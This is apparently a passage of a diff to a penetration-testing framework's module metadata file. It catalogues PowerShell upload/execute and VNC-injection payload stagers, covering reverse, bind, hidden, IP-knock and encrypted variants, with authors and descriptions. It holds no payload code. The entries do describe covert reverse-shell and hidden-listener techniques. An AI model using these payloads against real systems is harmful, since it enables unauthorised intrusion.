"type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_hidden_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/upexec/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp", + "check": false, + "post_auth": 
false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + 
"skape ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/upexec/bind_named_pipe": { + "name": "Powershell Exec, Windows Upload/Execute, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/upexec/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_named_pipe", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/upexec/bind_nonx_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)", + 
"references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/upexec/bind_tcp_rc4": { + "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp_rc4" + }, + 
"payload_cmd/windows/powershell/upexec/bind_tcp_uuid": { + "name": "Powershell Exec, Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/upexec/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/upexec/find_tag": { + "name": "Powershell Exec, Windows Upload/Execute, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/upexec/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + 
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/find_tag", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/upexec/reverse_ipv6_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/upexec/reverse_nonx_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_nonx_tcp", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/upexec/reverse_ord_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_allports": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an 
executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_dns": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": 
"windows/upexec/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it 
(staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/upexec/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_uuid", + "staged": true, + "stage_refname": 
"windows/upexec", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/upexec/reverse_udp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse UDP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "RageLtMan " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_udp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_udp" + }, + "payload_cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). 
After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 
TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/vncinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
